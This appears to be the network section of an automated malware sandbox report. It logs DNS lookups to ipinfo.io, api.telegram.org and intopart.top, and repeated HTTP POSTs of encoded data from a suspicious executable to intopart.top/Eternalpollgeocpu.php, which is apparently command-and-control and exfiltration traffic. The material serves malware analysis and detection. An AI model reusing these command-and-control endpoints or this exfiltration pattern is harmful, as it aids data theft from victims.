Apr 29, 2024 01:04:30.703939915 CEST	80	49886	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:30.703953981 CEST	80	49886	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:30.703965902 CEST	80	49886	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:30.704082966 CEST	49886	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:30.830441952 CEST	49886	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:30.831079006 CEST	49887	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:30.940855980 CEST	80	49886	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:30.940913916 CEST	49886	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:30.941385984 CEST	80	49887	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:30.941462040 CEST	49887	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:30.941590071 CEST	49887	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:31.051924944 CEST	80	49887	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:31.052455902 CEST	80	49887	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:31.052603006 CEST	49887	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:31.204473972 CEST	80	49887	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:31.335042000 CEST	80	49887	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:31.335067034 CEST	80	49887	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:31.335073948 CEST	80	49887	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:31.335175037 CEST	49887	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:31.484174967 CEST	49887	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:31.485733032 CEST	49888	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:31.595467091 CEST	80	49888	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:31.595591068 CEST	80	49887	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:31.595678091 CEST	49887	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:31.595690012 CEST	49888	80	192.168.2.4	172.67.144.153

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 29, 2024 01:02:10.395172119 CEST	58082	53	192.168.2.4	1.1.1.1
Apr 29, 2024 01:02:10.506083012 CEST	53	58082	1.1.1.1	192.168.2.4
Apr 29, 2024 01:02:11.636110067 CEST	61725	53	192.168.2.4	1.1.1.1
Apr 29, 2024 01:02:11.747047901 CEST	53	61725	1.1.1.1	192.168.2.4
Apr 29, 2024 01:02:32.793123007 CEST	49250	53	192.168.2.4	1.1.1.1
Apr 29, 2024 01:02:33.027493000 CEST	53	49250	1.1.1.1	192.168.2.4
Apr 29, 2024 01:03:06.469762087 CEST	60570	53	192.168.2.4	1.1.1.1
Apr 29, 2024 01:03:06.581691980 CEST	53	60570	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 29, 2024 01:02:10.395172119 CEST	192.168.2.4	1.1.1.1	0x80e0	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
Apr 29, 2024 01:02:11.636110067 CEST	192.168.2.4	1.1.1.1	0x2115	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Apr 29, 2024 01:02:32.793123007 CEST	192.168.2.4	1.1.1.1	0x79ee	Standard query (0)	intopart.top	A (IP address)	IN (0x0001)	false
Apr 29, 2024 01:03:06.469762087 CEST	192.168.2.4	1.1.1.1	0xbc79	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Apr 29, 2024 01:02:10.506083012 CEST	1.1.1.1	192.168.2.4	0x80e0	No error (0)	ipinfo.io	34.117.186.192	A (IP address)	IN (0x0001)	false
Apr 29, 2024 01:02:11.747047901 CEST	1.1.1.1	192.168.2.4	0x2115	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false
Apr 29, 2024 01:02:33.027493000 CEST	1.1.1.1	192.168.2.4	0x79ee	No error (0)	intopart.top	172.67.144.153	A (IP address)	IN (0x0001)	false
Apr 29, 2024 01:02:33.027493000 CEST	1.1.1.1	192.168.2.4	0x79ee	No error (0)	intopart.top	104.21.28.68	A (IP address)	IN (0x0001)	false
Apr 29, 2024 01:03:06.581691980 CEST	1.1.1.1	192.168.2.4	0xbc79	No error (0)	ipinfo.io	34.117.186.192	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ipinfo.io

api.telegram.org

intopart.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49739	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:02:33.169429064 CEST	256	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Apr 29, 2024 01:02:33.280384064 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:02:34.475781918 CEST	344	OUT	Data Raw: 00 00 04 02 03 0d 01 02 05 06 02 01 02 00 01 01 00 05 05 01 02 01 03 08 00 00 0f 04 04 55 00 04 0f 53 06 01 02 50 06 55 0e 0a 06 06 06 04 06 56 03 05 0c 5d 0c 05 06 57 04 0e 03 04 04 05 04 0f 00 0a 0f 5b 06 0f 06 02 0d 0e 0e 52 0a 05 0e 54 02 05 Data Ascii: USPUV]W[RTRW\L~@^_Zwrmv[]QU}LclsXcpo{o^XhSTc^`~e~V@xSn~bq
Apr 29, 2024 01:02:34.899158955 CEST	1289	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:02:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QDdIkzze5au1xCc1HwfkOp8PhtsOrXH3ix8ajg8tAcSv5DwbFIAvg237QxEQLBanuSMaGGLb%2B1o119sNRTtk3BXIA%2B%2F5h5kiEOMBiJsYZtRlCDdKbTG5g9cB6qsF0ts%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baae39ae6529f1-ORD alt-svc: h2=":443"; ma=60 Data Raw: 35 32 38 0d 0a 56 4a 7d 5e 7a 7d 63 00 6c 71 64 00 7f 61 5a 5f 7c 77 74 53 7e 60 7a 53 6e 5d 5e 04 7d 5c 52 04 74 5a 76 54 6d 5f 6a 5e 75 48 55 59 7c 61 78 01 55 4b 71 40 63 62 74 59 7f 71 75 01 7f 59 54 08 78 65 6b 55 6a 4d 78 5b 75 5c 76 5f 77 4f 6d 48 7e 62 65 5a 6a 7f 78 40 7f 67 63 07 61 4c 7b 06 7c 5b 7d 03 69 60 6a 59 6c 64 7c 06 7b 64 68 06 7b 6e 60 58 6d 5b 78 03 78 4d 6d 5e 68 59 6b 5f 79 67 5e 03 6a 5b 7c 5b 75 58 64 05 7a 51 41 5b 68 67 73 50 68 71 65 43 61 0a 6b 5f 78 52 52 46 77 70 62 0c 79 62 6e 5b 7d 42 71 5e 6c 4f 7a 48 62 73 6f 01 76 5f 5e 06 76 72 7e 50 7e 5d 79 5f 60 5b 7d 06 76 65 52 09 7f 6c 65 04 60 6f 73 5d 7f 05 7c 01 6f 6f 73 03 6c 63 76 01 7c 6d 6c 08 77 67 6f 5f 7e 61 7e 09 69 53 5d 41 7b 6d 5f 5b 7e 5c 7d 06 7b 5d 46 51 7f 7c 77 50 7f 63 7c 41 7e 59 7d 5e 6f 53 77 07 6f 04 7f 5b 7e 61 56 5e 7c 64 73 0a 7f 59 75 42 6d 4d 74 01 7e 72 6c 04 63 63 65 51 7b 5c 79 07 77 76 78 03 7e 66 68 05 7e 76 7d 4f 74 5c 73 07 7f 62 71 42 7c 67 54 0a 79 66 60 0b 7e 4d 59 03 75 72 69 03 74 [TRUNCATED] Data Ascii: 528VJ}^z}clqdaZ_\|wtS~`zSn]^}\RtZvTm_j^uHUY\|axUKq@cbtYquYTxekUjMx[u\v_wOmH~beZjx@gcaL{\|[}i`jYld\|{dh{n`Xm[xxMm^hYk_yg^j[\|[uXdzQA[hgsPhqeCak_xRRFwpbybn[}Bq^lOzHbsov_^vr~P~]y_`[}veRle`os]\|ooslcv\|mlwgo_~a~iS]A{m_[~\}{]FQ\|wPc\|A~Y}^oSwo[~aV^\|dsYuBmMt~rlcceQ{\ywvx~fh~v}Ot\sbqB\|gTyf`~MYurit_iI\|_rllwwuOxLq\|p_{I^{YZy}Yz\VxM\L\|^^{gp}b{Ovad\|\|H}wd\|_yCultz\|pFwp\AyOe}\|vxOru]]waxtO~\|^T@tbmuulORiwBpcpIxRsEx`b\|StvgZ}\P\|}]{CT~buM\|`x\|\|`}`tB~gv{CkK{bxH\|_cK}gcBpeAzchB~\RtsSz_Wuvt~HZ~X}wbsDbq\|YP@xvx@~ssuL[tqqJ\|qb~R^}I{vqkG{ru~^[{gl{gpymgxr\|{Mb{]NZxgtK}r^]vq]Y}l]kd\|h_eAvRpOlo`w^PnqX]}lT_z\yvxBagx[L~JxY}]c\j^u[x@
Apr 29, 2024 01:02:34.899173021 CEST	610	IN	Data Raw: 7c 7f 7d 4f 60 55 7c 06 68 63 7f 5e 78 6f 7c 5e 7a 63 7e 02 68 7e 7c 09 60 67 6b 5b 7e 5b 65 52 7a 53 59 51 57 61 61 45 54 71 5c 62 51 59 77 55 68 55 55 53 66 63 04 48 57 5e 61 4d 56 0b 74 40 62 71 08 5b 68 62 45 5a 7f 70 7c 51 7c 60 72 51 7a 4d Data Ascii: \|}O`U\|hc^xo\|^zc~h~\|`gk[~[eRzSYQWaaETq\bQYwUhUUSfcHW^aMVt@bq[hbEZp\|Q\|`rQzMU^}rpwcfQmXfXwv`J~ftiHjUwbZ[hauB\|JzSKsVi`GZ~nXXbVRXeITocCTp{q_UHy\}~g{Z{ppFTV]UwBQ`SFPXYWkgz\Y^i]@jp\PJxK{XPUZ{EQoUA[X@nbP@Q_z\y{ZpNCZXFZL~
Apr 29, 2024 01:02:34.899188995 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Apr 29, 2024 01:02:35.494571924 CEST	232	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 384 Expect: 100-continue
Apr 29, 2024 01:02:35.605602026 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:02:35.605768919 CEST	384	OUT	Data Raw: 58 5d 5a 5e 55 5b 5b 51 54 56 50 51 5a 54 51 55 5b 5d 5e 48 54 5f 50 46 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X]Z^U[[QTVPQZTQU[]^HT_PF]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'X2-8 Y%%\,6,P$(:?3Q'#/Y& 3>' Z/!Z/,
Apr 29, 2024 01:02:35.885021925 CEST	732	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:02:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N27bEqQZfidbDxBVJIoygd3pC5GpGy4Bfm0lUsLDTQTw2%2BwLBI5AgK2AoJDoLaoyO0nHTQJrpXCzN2nGFfY%2BcagRb42WZ4e8M0CiXRfM14xt%2BBMbe3r6C%2FXxSpr2fyI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baae483f2029f1-ORD alt-svc: h2=":443"; ma=60 Data Raw: 39 38 0d 0a 0e 12 20 1e 28 02 2e 0b 3e 31 35 0d 33 0c 28 08 31 59 2b 1c 28 2f 04 41 25 1d 3f 07 2f 00 36 14 26 37 3f 06 23 5f 27 01 24 32 33 54 3c 1e 20 59 02 1c 3a 1d 24 39 22 1c 25 10 01 15 3f 0c 0f 1b 22 3e 20 58 29 16 22 56 26 3f 25 1a 3c 20 2e 1f 2b 39 27 0e 2d 2d 22 05 32 0e 37 1e 3f 35 2c 52 08 13 20 52 3f 09 27 0f 22 5e 3f 56 33 1c 08 59 27 26 38 0a 36 2b 28 53 2b 07 05 00 30 54 22 12 26 1c 00 50 2e 30 27 41 34 2f 2a 03 24 2d 21 5c 2f 02 20 49 0f 34 5d 53 0d 0a Data Ascii: 98 (.>153(1Y+(/A%?/6&7?#_'$23T< Y:$9"%?"> X)"V&?%< .+9'--"27?5,R R?'"^?V3Y'&86+(S+0T"&P.0'A4/*$-!\/ I4]S
Apr 29, 2024 01:02:35.885035038 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49740	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:02:36.919820070 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1788 Expect: 100-continue
Apr 29, 2024 01:02:37.030399084 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:02:37.030561924 CEST	1788	OUT	Data Raw: 58 53 5f 5a 50 5b 5b 57 54 56 50 51 5a 53 51 52 5b 53 5e 45 54 5a 50 48 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XS_ZP[[WTVPQZSQR[S^ETZPH]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'[%.0 2,Y2,%+'>$(2+- 00/V;?5"#&: Z/!Z/0
Apr 29, 2024 01:02:37.433208942 CEST	728	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:02:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lBW36374oOSd88bBqv3AP94HcsbMJoRqIMcD0C2B5nnJiObewQAvvuBoBinDaGt8rETwT8cDznFX56SEjeqYPfPDfjGND03RJamF2%2F23vdzhK8D4BK%2FF6J4dozJlVq0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baae511fe02a7e-ORD alt-svc: h2=":443"; ma=60 Data Raw: 39 38 0d 0a 0e 12 20 11 3f 05 3e 0e 3e 1c 22 54 27 0c 38 0f 31 11 05 1d 2a 3c 26 42 32 0d 34 19 2c 00 0b 0a 27 1a 0a 5e 37 39 28 5b 26 22 23 1f 2a 34 20 59 02 1c 3a 1c 31 39 22 5b 25 58 2b 5c 3f 32 35 15 36 00 38 10 2b 28 25 0e 33 2f 08 00 3c 33 2e 5c 3f 07 3c 13 2e 3d 3d 5b 32 0e 2b 55 3e 35 2c 52 08 13 20 1e 3f 1e 24 56 35 3b 24 0f 24 0c 0f 00 26 1c 2c 0b 22 06 20 1f 3f 07 2f 01 24 0b 25 04 25 54 25 0e 3a 30 2c 19 23 02 21 5b 24 2d 21 5c 2f 02 20 49 0f 34 5d 53 0d 0a Data Ascii: 98 ?>>"T'81<&B24,'^79([&"#4 Y:19"[%X+\?2568+(%3/<3.\?<.==[2+U>5,R ?$V5;$$&," ?/$%%T%:0,#![$-!\/ I4]S
Apr 29, 2024 01:02:37.433227062 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49741	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:02:36.971118927 CEST	257	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue Connection: Keep-Alive
Apr 29, 2024 01:02:37.081058979 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:02:37.084244967 CEST	1080	OUT	Data Raw: 58 5c 5f 5d 55 56 5e 53 54 56 50 51 5a 5f 51 5a 5b 5e 5e 42 54 5f 50 47 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X\_]UV^STVPQZ_QZ[^^BT_PG]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'Y2=4,X1.&-50V&-0^=)%+[4$ 0;) 5': Z/!Z/
Apr 29, 2024 01:02:37.483591080 CEST	583	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:02:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uT9Y3PR%2FXpPdL9cAXttvNF6FE%2FRDdwqFZk9RwaucManwqMcMfhnwzJwskKiSYlRiDo4r%2FDgipb711asIXHU%2B7SydDQKJMm6HB9WzIM02jErycyBLAoQi75vhNYmpFoM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baae51692210d9-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:02:37.483603954 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49742	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:02:39.717363119 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:02:39.828016043 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:02:39.830488920 CEST	1080	OUT	Data Raw: 58 5b 5a 5a 50 59 5b 55 54 56 50 51 5a 55 51 50 5b 53 5e 42 54 5f 50 48 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X[ZZPY[UTVPQZUQP[S^BT_PH]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'%-7,%>9]-&(V&-[*)2W?[/$<,?\7#"0 Z/!Z/(
Apr 29, 2024 01:02:40.225403070 CEST	579	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:02:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oHN1stEEQ4BK76K2TMG0R%2FOxZdJy67oPoiAk0OlYKFrPq2v%2BvcdC4VncAPzgJr2OoX24fk6kphSXQW1Rr2SiRsRbqw2yz1jTQAVMSqALU2uVA1PLL3ZbX2bKAcNzY9A%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baae629e89233f-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:02:40.225426912 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49743	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:02:41.043483019 CEST	257	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue Connection: Keep-Alive
Apr 29, 2024 01:02:41.154315948 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:02:41.154493093 CEST	1080	OUT	Data Raw: 58 5f 5f 5b 50 5c 5b 5f 54 56 50 51 5a 57 51 56 5b 5e 5e 49 54 5c 50 48 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X__[P\[_TVPQZWQV[^^IT\PH]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'Z'-$ <2=/63',Z**?<$#W,)X#3' Z/!Z/
Apr 29, 2024 01:02:41.553327084 CEST	583	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:02:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5yMm%2Bx9cDmoZLb0qFX6SJCUzDTkuqlI0ZR9gHlh8RRBnZvdMHSfiUUCxg22nuxRLgFgMYbTe4cP6%2BvNMNkKwoA5FDtXHAAYQ6e5h%2F3gW8sllQfMfcyHSvKZJ%2BJJOHfQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baae6aeb252c90-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:02:41.553355932 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49746	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:02:45.759346962 CEST	257	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1788 Expect: 100-continue Connection: Keep-Alive
Apr 29, 2024 01:02:45.869940996 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:02:45.874809027 CEST	1788	OUT	Data Raw: 5d 5f 5a 58 55 57 5e 53 54 56 50 51 5a 55 51 54 5b 5e 5e 48 54 58 50 41 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]_ZXUW^STVPQZUQT[^^HTXPA]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$&<4/&*/&(0<^>:>S?R$3U;![4)0 Z/!Z/(
Apr 29, 2024 01:02:46.267636061 CEST	730	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:02:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UBvPTvc1JpX2oC94jlJM9VEB9GJ%2BGJ3Mo%2Bj0sPBubFvGJqs6285wHlMUHg0mLpAwWAmA7gmFdsl3VRwnw2qnLlQguWsEqG0o5oLms8%2B5hvO9jmff1Uvm8EyYnjMhnqM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baae885c95e26b-ORD alt-svc: h2=":443"; ma=60 Data Raw: 39 38 0d 0a 0e 12 23 05 2b 3b 3a 0a 29 32 2e 50 33 22 05 19 25 2f 06 06 3e 01 21 1d 32 0d 38 14 3b 10 2a 19 24 34 0e 14 20 29 06 10 26 21 2f 1c 28 34 20 59 02 1c 39 43 26 00 31 01 25 3d 27 14 28 1c 26 05 22 2e 06 58 3e 01 2e 1b 30 59 21 5c 3f 1d 0f 00 29 3a 27 0f 2e 3d 04 06 26 37 01 52 3c 1f 2c 52 08 13 20 53 2b 56 37 0e 22 2b 28 0d 27 21 26 14 27 25 01 18 35 16 24 55 28 2a 24 15 30 0b 36 12 26 0c 39 08 2e 0d 01 45 34 2f 22 00 27 17 21 5c 2f 02 20 49 0f 34 5d 53 0d 0a Data Ascii: 98#+;:)2.P3"%/>!28;$4 )&!/(4 Y9C&1%='(&".X>.0Y!\?):'.=&7R<,R S+V7"+('!&'%5$U($06&9.E4/"'!\/ I4]S
Apr 29, 2024 01:02:46.267685890 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49748	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:02:46.393465996 CEST	257	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue Connection: Keep-Alive
Apr 29, 2024 01:02:46.503640890 CEST	25	IN	HTTP/1.1 100 Continue
